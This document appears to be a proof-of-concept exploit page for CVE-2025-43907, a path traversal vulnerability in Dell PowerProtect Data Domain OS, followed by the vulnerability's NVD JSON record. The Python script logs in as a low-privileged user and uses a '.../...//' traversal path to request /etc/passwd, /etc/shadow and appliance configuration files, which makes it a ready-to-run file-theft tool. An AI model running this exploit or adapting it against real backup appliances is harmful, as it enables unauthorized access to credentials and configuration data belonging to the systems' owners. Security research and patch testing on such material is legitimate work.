CVE-2025-43907

# CVE-2025-43907 - Dell PowerProtect Data Domain Path Traversal PoC # Vulnerability: Path Traversal via '.../...//' sequence # Affected: DD OS 7.7.1.0 - 8.3.0.15, LTS2025 8.3.1.0, LTS2024 7.13.1.0-7.13.1.30, LTS2023 7.10.1.0-7.10.1.60 import requests TARGET_HOST = "https://target-dd-host" USERNAME = "low_priv_user" PASSWORD = "password123" def exploit_path_traversal(target, session_cookie, target_file): """ Exploit path traversal using '.../...//' bypass technique to read arbitrary files from the DD OS filesystem. """ # Construct malicious path using '.../...//' traversal sequence malicious_path = "/rest/v1.0/.../...//etc/" + target_file headers = { "Cookie": session_cookie, "Content-Type": "application/json" } response = requests.get( target + malicious_path, headers=headers, verify=False ) if response.status_code == 200: print(f"[+] File content retrieved:\n{response.text}") return response.text else: print(f"[-] Exploit failed with status code: {response.status_code}") return None def authenticate(target, username, password): """ Authenticate as a low-privileged user to obtain a session cookie. """ login_url = target + "/rest/v1.0/auth" payload = { "username": username, "password": password } response = requests.post(login_url, json=payload, verify=False) if response.status_code == 200: session_cookie = response.cookies.get("DDSessionId") print(f"[+] Authenticated successfully. Session: {session_cookie}") return session_cookie else: print("[-] Authentication failed") return None if __name__ == "__main__": print("[*] CVE-2025-43907 PoC - Dell DD OS Path Traversal") print("[*] Note: For authorized security testing only\n") # Step 1: Authenticate as low-privileged user session = authenticate(TARGET_HOST, USERNAME, PASSWORD) if session: # Step 2: Exploit path traversal to read sensitive files sensitive_files = [ "passwd", "shadow", "ddconfig.conf", "data-domain-config.xml" ] for f in sensitive_files: print(f"\n[*] Attempting to read: {f}") exploit_path_traversal(TARGET_HOST, session, f)

{"cve": {"id": "CVE-2025-43907", "sourceIdentifier": "[email protected]", "published": "2025-10-07T19:15:37.350", "lastModified": "2025-10-14T20:10:36.607", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.3.0.15, LTS2025 release version 8.3.1.0, LTS2024 release versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain a Path Traversal: '.../...//' vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information exposure."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-35"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.70", "matchCriteriaId": "7FCE50EA-F2B8-4455-A489-1947B0CBFEEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.40", "matchCriteriaId": "C0EA46C5-6776-411A-8FBC-5B32BC216888"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.0.0", "versionEndIncluding": "8.3.0.15", "matchCriteriaId": "F1DB489A-E2CF-4477-A08B-101B569A714E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.3.1.10", "matchCriteriaId": "9E0743E3-14E7-4FF9-88C5-E038D62F2344"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000376224/dsa-2025-333-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}